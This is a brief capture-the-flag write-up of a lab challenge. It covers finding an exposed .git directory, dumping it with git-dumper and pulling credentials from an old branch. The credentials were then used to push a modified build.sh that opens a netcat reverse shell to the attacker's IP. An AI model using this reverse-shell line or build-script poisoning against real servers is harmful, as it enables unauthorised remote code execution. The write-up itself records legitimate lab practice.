Glaciers of Switzerland Writeup

TL;DR

• Brute-force directories.
• Find the .git directory
• Extract the repo with git-dumper (https://github.com/arthaud/git-dumper)
• Find the credientials in the git history of an old branch
• Write to the repo with the extracted creds and get code execution

Complete Writeup

With gobuster, we found that there is a .git directory on the server. Then we installed git-dumper with pip3 install git-dumper Then extracted the repo with: ~/.local/bin/git-dumper https://ea439dee-8c4d-4ead-aa86-40a208094d02.idocker.vuln.land//website-repo/.git ~/Documents/openecsc/repo_dump

There was nothing too interesting in the files. With gitkraken we did some further exploration and found an old version of the README.md with had credientials in them:

As the build.sh gets executed on each push, we modified it to get us a nc reverse shell back:

#!/bin/bash

cp index.html.tpl index.html
nc 10.13.0.xxx 5555 -e /bin/bash

Then we started a listener with nc -lnvp 5555

And pushed to the repo: git push https://ea439dee-8c4d-4ead-aa86-40a208094d02.idocker.vuln.land/.git-server/website.git/

We get a reverse shell back and get the flag. (Sorry I did not save the flag.)

Lessons learned

Its often easier to use a GUI tool to explore all branches and commits of a git repo.